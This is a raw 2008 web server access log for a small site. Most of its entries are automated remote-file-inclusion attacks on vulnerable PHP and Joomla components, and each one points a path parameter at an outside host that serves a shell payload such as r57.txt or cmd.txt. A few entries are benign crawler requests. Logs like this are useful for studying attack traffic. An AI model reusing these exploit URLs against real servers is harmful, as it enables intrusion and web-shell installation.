88.214.192.29 - - [29/Jul/2008:09:49:58 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.214.192.29 - - [29/Jul/2008:09:49:59 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.70.18 - - [29/Jul/2008:09:50:03 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://moisidis.gr/siteframe/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
88.214.192.29 - - [29/Jul/2008:09:50:05 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.234.103 - - [29/Jul/2008:09:50:13 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.44.234.103 - - [29/Jul/2008:09:50:14 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.44.234.103 - - [29/Jul/2008:09:50:16 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 200 3694 "-" "libwww-perl/5.811" "www.dmulk.com"
84.21.71.133 - - [29/Jul/2008:09:50:19 -0700] "GET /logs/access_071130.log/index.php?seite=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [29/Jul/2008:09:50:20 -0700] "GET /logs/index.php?seite=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:09:50:21 -0700] "GET /logs/access.log/index.php?x=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [29/Jul/2008:09:50:22 -0700] "GET /index.php?seite=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 200 18443 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.214.193 - - [29/Jul/2008:09:50:24 -0700] "GET /logs/access_080329.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:09:50:24 -0700] "GET /index.php?x=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 200 18427 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.214.193 - - [29/Jul/2008:09:50:24 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.214.193 - - [29/Jul/2008:09:50:25 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:09:50:25 -0700] "GET /logs/index.php?x=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.234.103 - - [29/Jul/2008:09:50:31 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.152.41.170 - - [29/Jul/2008:09:50:32 -0700] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://shopsb.ru/THIEF/kiss/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.214.193 - - [29/Jul/2008:09:50:36 -0700] "GET /logs/access_080313.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [29/Jul/2008:09:50:51 -0700] "GET /logs/access_080128.log/index.php?seite=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.201.66 - - [29/Jul/2008:09:51:09 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.latinamericancongress.com/imag_eventos/id.txt? HTTP/1.1" 200 18437 "-" "libwww-perl/5.811" "www.dmulk.com"
212.50.0.218 - - [29/Jul/2008:09:51:13 -0700] "GET /logs/access_080315.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://crystalworks.com/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.50.0.218 - - [29/Jul/2008:09:51:13 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://crystalworks.com/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.50.0.218 - - [29/Jul/2008:09:51:14 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://crystalworks.com/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.205.76.81 - - [29/Jul/2008:09:51:15 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://rjoos.ch/Reise/images/tOtti/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.205.76.81 - - [29/Jul/2008:09:51:16 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://rjoos.ch/Reise/images/tOtti/help.txt??? HTTP/1.1" 200 3694 "-" "libwww-perl/5.810" "www.dmulk.com"
67.205.76.81 - - [29/Jul/2008:09:51:20 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://rjoos.ch/Reise/images/tOtti/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.205.76.81 - - [29/Jul/2008:09:51:32 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://rjoos.ch/Reise/images/tOtti/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.45.177.194 - - [29/Jul/2008:09:51:35 -0700] "GET /logs/access_080322.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
207.45.177.194 - - [29/Jul/2008:09:51:35 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
62.112.193.46 - - [29/Jul/2008:09:51:36 -0700] "GET /logs/home.php?pagina=http://www.metal-headz.co.uk/modules/coppermine/include/.../.../.../.../.../.../idsc5.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.193.46 - - [29/Jul/2008:09:51:38 -0700] "GET /logs/access.log/home.php?pagina=http://www.metal-headz.co.uk/modules/coppermine/include/.../.../.../.../.../.../idsc5.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.193.46 - - [29/Jul/2008:09:51:38 -0700] "GET /home.php?pagina=http://www.metal-headz.co.uk/modules/coppermine/include/.../.../.../.../.../.../idsc5.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.169.0.50 - - [29/Jul/2008:09:51:39 -0700] "GET /phphtml.php?htmlclass_path=http://www.spanishvida.com//admin/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
62.169.0.50 - - [29/Jul/2008:09:51:39 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.spanishvida.com//admin/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
193.178.228.12 - - [29/Jul/2008:09:51:41 -0700] "GET /phphtml.php?htmlclass_path=http://dantman.com/.../rid? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
193.178.228.12 - - [29/Jul/2008:09:51:41 -0700] "GET /logs/phphtml.php?htmlclass_path=http://dantman.com/.../rid? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
161.58.8.25 - - [29/Jul/2008:09:51:41 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=uid=80(www)%20gid=80(www)%20groups=80(www)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
161.58.8.25 - - [29/Jul/2008:09:51:41 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=uid=80(www)%20gid=80(www)%20groups=80(www)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.205.120.213 - - [29/Jul/2008:09:51:43 -0700] "GET /logs/access_080329.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.120.213 - - [29/Jul/2008:09:51:44 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.120.213 - - [29/Jul/2008:09:51:44 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.36.250.17 - - [29/Jul/2008:09:51:59 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://dpfbrasil.net63.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.36.250.17 - - [29/Jul/2008:09:51:59 -0700] "GET /logs/access_080209.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://dpfbrasil.net63.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.36.250.17 - - [29/Jul/2008:09:52:00 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://dpfbrasil.net63.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.36.250.17 - - [29/Jul/2008:09:52:00 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://dpfbrasil.net63.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
67.205.120.213 - - [29/Jul/2008:09:52:00 -0700] "GET /logs/access_080313.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.36.107 - - [29/Jul/2008:09:52:03 -0700] "GET /logs/access_080528.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.36.107 - - [29/Jul/2008:09:52:06 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 200 18589 "-" "libwww-perl/5.805" "www.dmulk.com"
132.199.139.171 - - [29/Jul/2008:09:52:06 -0700] "GET /logs/access_080225.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.70.36.107 - - [29/Jul/2008:09:52:06 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
132.199.139.171 - - [29/Jul/2008:09:52:06 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
132.199.139.171 - - [29/Jul/2008:09:52:07 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
132.199.139.171 - - [29/Jul/2008:09:52:11 -0700] "GET /logs/access_080329.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.50.0.218 - - [29/Jul/2008:09:52:24 -0700] "GET /logs/access_080207.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://crystalworks.com/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.15.10.22 - - [29/Jul/2008:09:52:24 -0700] "GET /phphtml.php?htmlclass_path=http://dantman.com/.../rid? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
204.15.10.22 - - [29/Jul/2008:09:52:24 -0700] "GET /logs/phphtml.php?htmlclass_path=http://dantman.com/.../rid? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
212.150.247.23 - - [29/Jul/2008:09:52:32 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.150.247.23 - - [29/Jul/2008:09:52:34 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.150.247.23 - - [29/Jul/2008:09:52:35 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.150.247.23 - - [29/Jul/2008:09:52:35 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.55.183.82 - - [29/Jul/2008:09:52:37 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://rjoos.ch/Reise/images/tOtti/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
74.55.183.82 - - [29/Jul/2008:09:52:37 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://rjoos.ch/Reise/images/tOtti/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
74.55.183.82 - - [29/Jul/2008:09:52:37 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://rjoos.ch/Reise/images/tOtti/help.txt??? HTTP/1.1" 200 3694 "-" "libwww-perl/5.813" "www.dmulk.com"
161.58.8.25 - - [29/Jul/2008:09:52:46 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=uid=80(www)%20gid=80(www)%20groups=80(www)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
161.58.8.25 - - [29/Jul/2008:09:52:46 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=uid=80(www)%20gid=80(www)%20groups=80(www)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
161.58.8.25 - - [29/Jul/2008:09:52:46 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=uid=80(www)%20gid=80(www)%20groups=80(www)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.70.36.107 - - [29/Jul/2008:09:52:48 -0700] "GET /logs/access_080327.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.74.10.235 - - [29/Jul/2008:09:52:49 -0700] "GET /robots.txt HTTP/1.0" 404 275 "http://majestic12.co.uk/bot.php?I=93DBDFA4580FB3258A1857667DE30A6A-D6B58BA9039A7653-56EDC80E5B8994A3-www.dmulk.com" "Mozilla/5.0 (compatible; MJ12bot/v1.2.1; http://www.majestic12.co.uk/bot.php?+)" "www.dmulk.com"
206.74.10.235 - - [29/Jul/2008:09:52:50 -0700] "GET /megumi/Necklace HTTP/1.1" 301 100 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.1; http://www.majestic12.co.uk/bot.php?+)" "www.dmulk.com"
206.74.10.235 - - [29/Jul/2008:09:52:50 -0700] "GET /megumi/Necklace/ HTTP/1.1" 200 4323 "http://www.dmulk.com/megumi/Necklace" "Mozilla/5.0 (compatible; MJ12bot/v1.2.1; http://www.majestic12.co.uk/bot.php?+)" "www.dmulk.com"
206.74.10.235 - - [29/Jul/2008:09:52:52 -0700] "GET /megumi/earrings HTTP/1.1" 301 100 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.1; http://www.majestic12.co.uk/bot.php?+)" "www.dmulk.com"
74.55.183.82 - - [29/Jul/2008:09:52:52 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://rjoos.ch/Reise/images/tOtti/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
206.74.10.235 - - [29/Jul/2008:09:52:53 -0700] "GET /megumi/earrings/ HTTP/1.1" 200 2081 "http://www.dmulk.com/megumi/earrings" "Mozilla/5.0 (compatible; MJ12bot/v1.2.1; http://www.majestic12.co.uk/bot.php?+)" "www.dmulk.com"
206.74.10.235 - - [29/Jul/2008:09:52:55 -0700] "GET /minami_site3.psd HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.1; http://www.majestic12.co.uk/bot.php?+)" "www.dmulk.com"
206.74.10.235 - - [29/Jul/2008:09:52:57 -0700] "GET /minamijewelry?D=A HTTP/1.1" 301 102 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.1; http://www.majestic12.co.uk/bot.php?+)" "www.dmulk.com"
206.74.10.235 - - [29/Jul/2008:09:52:57 -0700] "GET /minamijewelry/?D=A HTTP/1.1" 200 2110 "http://www.dmulk.com/minamijewelry?D=A" "Mozilla/5.0 (compatible; MJ12bot/v1.2.1; http://www.majestic12.co.uk/bot.php?+)" "www.dmulk.com"
206.74.10.235 - - [29/Jul/2008:09:52:59 -0700] "GET /minamijewelry?M=A HTTP/1.1" 301 102 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.1; http://www.majestic12.co.uk/bot.php?+)" "www.dmulk.com"
206.74.10.235 - - [29/Jul/2008:09:53:00 -0700] "GET /minamijewelry/?M=A HTTP/1.1" 200 2110 "http://www.dmulk.com/minamijewelry?M=A" "Mozilla/5.0 (compatible; MJ12bot/v1.2.1; http://www.majestic12.co.uk/bot.php?+)" "www.dmulk.com"
61.241.88.28 - - [29/Jul/2008:09:53:01 -0700] "GET /logs/access_080118.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.241.88.28 - - [29/Jul/2008:09:53:01 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.241.88.28 - - [29/Jul/2008:09:53:01 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.74.10.235 - - [29/Jul/2008:09:53:02 -0700] "GET /minamijewelry?N=D HTTP/1.1" 301 102 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.1; http://www.majestic12.co.uk/bot.php?+)" "www.dmulk.com"
206.74.10.235 - - [29/Jul/2008:09:53:02 -0700] "GET /minamijewelry/?N=D HTTP/1.1" 200 2110 "http://www.dmulk.com/minamijewelry?N=D" "Mozilla/5.0 (compatible; MJ12bot/v1.2.1; http://www.majestic12.co.uk/bot.php?+)" "www.dmulk.com"
206.74.10.235 - - [29/Jul/2008:09:53:04 -0700] "GET /minamijewelry?S=A HTTP/1.1" 301 102 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.1; http://www.majestic12.co.uk/bot.php?+)" "www.dmulk.com"
206.74.10.235 - - [29/Jul/2008:09:53:05 -0700] "GET /minamijewelry/?S=A HTTP/1.1" 200 2110 "http://www.dmulk.com/minamijewelry?S=A" "Mozilla/5.0 (compatible; MJ12bot/v1.2.1; http://www.majestic12.co.uk/bot.php?+)" "www.dmulk.com"
67.15.186.5 - - [29/Jul/2008:09:53:06 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/lujonies/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
206.74.10.235 - - [29/Jul/2008:09:53:07 -0700] "GET /mobileoffice?D=A HTTP/1.1" 301 101 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.1; http://www.majestic12.co.uk/bot.php?+)" "www.dmulk.com"
206.74.10.235 - - [29/Jul/2008:09:53:07 -0700] "GET /mobileoffice/?D=A HTTP/1.1" 200 5024 "http://www.dmulk.com/mobileoffice?D=A" "Mozilla/5.0 (compatible; MJ12bot/v1.2.1; http://www.majestic12.co.uk/bot.php?+)" "www.dmulk.com"
206.74.10.235 - - [29/Jul/2008:09:53:10 -0700] "GET /mobileoffice?M=A HTTP/1.1" 301 101 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.1; http://www.majestic12.co.uk/bot.php?+)" "www.dmulk.com"
61.241.88.28 - - [29/Jul/2008:09:53:10 -0700] "GET /logs/access_080110.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.74.10.235 - - [29/Jul/2008:09:53:10 -0700] "GET /mobileoffice/?M=A HTTP/1.1" 200 5024 "http://www.dmulk.com/mobileoffice?M=A" "Mozilla/5.0 (compatible; MJ12bot/v1.2.1; http://www.majestic12.co.uk/bot.php?+)" "www.dmulk.com"
66.63.166.23 - - [29/Jul/2008:09:53:11 -0700] "GET /logs//404.php?DOCUMENT_ROOT=http://www.brazebo.it/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
66.63.166.23 - - [29/Jul/2008:09:53:11 -0700] "GET //404.php?DOCUMENT_ROOT=http://www.brazebo.it/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
66.63.166.23 - - [29/Jul/2008:09:53:11 -0700] "GET /logs/access.log//404.php?DOCUMENT_ROOT=http://www.brazebo.it/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
67.15.186.5 - - [29/Jul/2008:09:53:12 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/lujonies/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
206.74.10.235 - - [29/Jul/2008:09:53:12 -0700] "GET /mobileoffice?N=D HTTP/1.1" 301 101 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.1; http://www.majestic12.co.uk/bot.php?+)" "www.dmulk.com"
206.74.10.235 - - [29/Jul/2008:09:53:13 -0700] "GET /mobileoffice/?N=D HTTP/1.1" 200 5024 "http://www.dmulk.com/mobileoffice?N=D" "Mozilla/5.0 (compatible; MJ12bot/v1.2.1; http://www.majestic12.co.uk/bot.php?+)" "www.dmulk.com"
88.214.192.29 - - [29/Jul/2008:09:53:14 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.214.192.29 - - [29/Jul/2008:09:53:15 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.74.10.235 - - [29/Jul/2008:09:53:15 -0700] "GET /mobileoffice?S=A HTTP/1.1" 301 101 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.1; http://www.majestic12.co.uk/bot.php?+)" "www.dmulk.com"
88.214.192.29 - - [29/Jul/2008:09:53:16 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.74.10.235 - - [29/Jul/2008:09:53:16 -0700] "GET /mobileoffice/?S=A HTTP/1.1" 200 5024 "http://www.dmulk.com/mobileoffice?S=A" "Mozilla/5.0 (compatible; MJ12bot/v1.2.1; http://www.majestic12.co.uk/bot.php?+)" "www.dmulk.com"
206.74.10.235 - - [29/Jul/2008:09:53:18 -0700] "GET /moon.psd HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.1; http://www.majestic12.co.uk/bot.php?+)" "www.dmulk.com"
206.74.10.235 - - [29/Jul/2008:09:53:19 -0700] "GET /myphpadmin HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.1; http://www.majestic12.co.uk/bot.php?+)" "www.dmulk.com"
206.74.10.235 - - [29/Jul/2008:09:53:21 -0700] "GET /plans?D=A HTTP/1.1" 301 94 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.1; http://www.majestic12.co.uk/bot.php?+)" "www.dmulk.com"
